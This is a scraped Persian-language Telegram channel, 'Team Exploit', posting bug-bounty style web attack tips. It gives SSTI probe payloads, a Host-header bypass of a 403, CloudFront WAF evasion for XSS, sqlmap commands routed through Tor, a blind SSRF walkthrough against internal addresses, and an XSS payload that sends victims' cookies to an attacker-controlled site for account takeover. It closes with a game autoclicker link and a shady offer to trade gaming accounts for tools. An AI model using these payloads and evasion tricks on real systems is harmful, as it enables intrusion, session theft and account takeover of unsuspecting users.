Team Exploit
1.83K subscribers
192 photos
28 videos
86 files
126 links
Download Telegram
اگر قسمت های نام کاربری و نام خانوادگی شما در برابر تزریق HTML آسیب پذیر است، آسیب پذیری SSTI را نیز امتحان کنید! SSTI را می توان با RCE ساخت. این یک SSTI Payload معمولی است.

{{ '7'*7 }}


و در اخر باید شناسایی کنیم که از چه موتور قالبی در back-end استفاده می شود تا بتوانیم RCE را بیشتر مورد بهره برداری قرار دهیم.

{{ 7*'7′ }}= 7777777 == Its Jinja2 Engine

{{ 7*'7′ }}= 49 == Its Twig Engine


┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
ریکوئست:
GET /admin
Host: test.com

ریسپانس: 403

فقط با تغییر دامنه میزبان به 127.0.0.1 می توانید 403 را دور بزنید


ریکوئست:
GET /admin
Host: 127.0.0.1

ریسپانس: 200 OK

┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
آسیب‌پذیری‌های احراز هویت مبتنی بر کوکی

┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
دور زدن Cloudfront XSS WAF

1) window["al"+"ert"]
2) دور زدن () با ``
3) فضا را با / جایگزین کنید
4) رمزگذاری نمادها:
🔹< = %3c
🔹> = %3e
🔹" = %22
🔹[ = %5b
🔹] = %5d
🔹`` = %60

مثال بدونه رمزنگاری:
<svg/onload=window["al"+"ert"]1337>

┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
تزریق SQL مبتنی بر زمان (Time-Based) یک تکنیک تزریق استنباطی SQL است که بر ارسال یک درخواست SQL به پایگاه داده تکیه دارد که پایگاه داده را مجبور می‌کند برای مدت زمان مشخصی (بر حسب ثانیه) قبل از پاسخگویی منتظر بماند.

برخی پیلود ها در تصویر است

#Sqli
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
تزریق Sql بر روی فرم ها

1. sqlmap -u target.com/registration --dbs --forms --crawl=2

2. تمام پیوندهای دارای فیلد ورودی را می خزد

3. پارامتری را که می خواهید آزمایش کنید انتخاب کنید

#Sqli #Sqlmap
Team Exploit
تزریق Sql بر روی فرم ها 1. sqlmap -u target.com/registration --dbs --forms --crawl=2 2. تمام پیوندهای دارای فیلد ورودی را می خزد 3. پارامتری را که می خواهید آزمایش کنید انتخاب کنید #Sqli #Sqlmap
اگه میخواید تو Sqlmap هنگام اسکن از تور استفاده کنید
از این کامند استفاده کنید
sqlmap -u "http://target_server/" --tor --tor-type=SOCKS5
#Sqli #Sqlmap
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
دیگه اصولا تارگتتون باید نسبت به این علائم واکنش نشون بده! (برای تست اسیب پذیری)

#Sqli

┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
نکات باگ بانتی


┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
نکات پاداش باگ!!!

SSRF بلایند از طریق دانلود کننده URL آپلود تصویر در
https://example{.}com

مراحل تولید مثل

1. یک حساب آزمایشی ایجاد کنید.
2. وارد آن حساب کاربری شوید.
3.به ویرایش نمایه بروید.
4. به پایین بروید.
5.به فیلد تصویر کاربر توجه کنید.
6. سعی کنید چیزی را آپلود کنید.
7. URL downloader را خواهید دید.
8. کلیبتور کلاینت برپ خود را باز کنید.
9. payload را در URL downloader کپی و جای‌گذاری کنید، مطمئن شوید که /test.png را در انتهای آن مانند example.com/test.png قرار دهید.
10. اکنون در کلاینت کلیبتور برپ نظرسنجی کنید.
11. به تعامل HTTP و DNS توجه کنید. آدرس IP از تعامل HTTP از شبکه داخلی است که به این معنی است که ما می توانیم برخی از مشکلات میان افزاری را انجام دهیم. توجه داشته باشید که در حال واکشی فایل test.png است. و IP از شبکه داخلی است.
12. پروکسی فاکسی خود را روشن کنید و برپ سوییت خود را باز کنید.
13. این ipv4 را در URL downloader قرار دهید: http://127.0.0.1/test.png
14. درخواست رهگیری. درخواست
15. متوجه یک خطا خواهید شد که برخی از اطلاعات مربوط به سرور را نشان می دهد که دوباره Blind SSRF را تأیید می کند.
16. ضمناً اگر به پورت 25 تغییر دهید، چیزی در مورد سرور Postfix SMTP لو می‌رود.

همچنین من توانستم تشخیص دهم که برنامه وب (فلانی) از libcurl استفاده می کند.


┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
نکات باگ بانتی: در اینجا نحوه افزایش مشکلات XSS به ATO وجود دارد👇

┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
Team Exploit
نکات باگ بانتی: در اینجا نحوه افزایش مشکلات XSS به ATO وجود دارد👇 ┌<(channel>>>>)-[~] └< (main)* >─» @Team_Exploit
آیا اسیب پذیری XSS را شناسایی کرده اید؟ خیلی سریع آن را با alert (1) یا alert (document.cookie) برای پرداخت متوسط ​​گزارش نکنید.

در اینجا نحوه افزایش مشکلات XSS به یک ATO برای پاداش های بسیار بالاتر آمده است:

1️⃣همیشه کوکی های مبتنی بر سشن Exfiltrating را در سرور کنترل شده خود امتحان کنید. این یک پیلود ساده است که می توانید برای نشان دادن ATO استفاده کنید:
 "><img src="x" onerror="document.location.href='https://yoursite(.)com?cookies=' + document.cookie + '' ">
این پیلود کوکی‌های کاربر را استخراج کرده و به سایت شما ارسال می‌کند. یک ویدیوی اثبات مفهوم (PoC) ایجاد کنید که نشان می‌دهد چگونه می‌توان از این کوکی‌ها برای تصاحب سشن کاربر استفاده کرد. یک درخواست به هر API تأیید شده ارسال کنید و نشان دهید که کوکی ها کار می کنند.


2️⃣اگر کوکی‌ها به‌عنوان HTTPOnly تنظیم شده‌اند، با انجام اقدامات حساس سمت کلاینت، مانند تغییر آدرس ایمیل یا رمز عبور کاربر که منجر به ATO می‌شود، تأثیر را تشدید کنید.


3️⃣اگر اقدامات حساس سمت سرویس گیرنده امکان پذیر نیست، کوکی ها یا نشانه های سشن لو رفته را در پاسخ های سرور در همه صفحات بررسی کنید. از پیلود XSS خود استفاده کنید تا آنها را به سرور کنترل شده خود منتقل کنید تا ATO دریافت کنید


4️⃣اگر هیچ کوکی سشن یا نشانه‌ای در هیچ صفحه‌ای یافت نشد، فضای ذخیره‌سازی محلی مرورگر را برای نشانه‌های سشن ذخیره‌شده بررسی کنید و بر این اساس محموله XSS خود را بسازید تا آنها را به سرور خود که منجر به ATO می‌شود، منتقل کنید.

┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
Team Exploit
جهیدم
ربات خودکار همستر کمبت

ویژگی ها:

🟢 تنظیم خودکار
🟢 کلیک خودکار برای بسیاری از حساب ها
🟢 چند رشته ای
🟢 منوی مناسب
🟢 پروکسی های رایگان

🟢 پشتیبانی از اکثر سیستم ها: Windows 7/8/8.1/10/11 (x32/64)
.


Link: https://github.com/Pratapsalgar/hamster-kombat-autobot

┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
مخاطب ها و اعضای فامیل بعد از فهمیدن بوی پول تو همستر کامبت:/
دوستان
اگر اکانت کالاف دیوتی موبایل دارید میتونید با یکی یا چندتا از ابزار ها طاق بزنید!

نکته درباره اکانت:
کرکی نباشه
حداقل ارزشش بالای 1M باشه

ابزار ها+ایدی
https://t.me/KnightGuardian59/119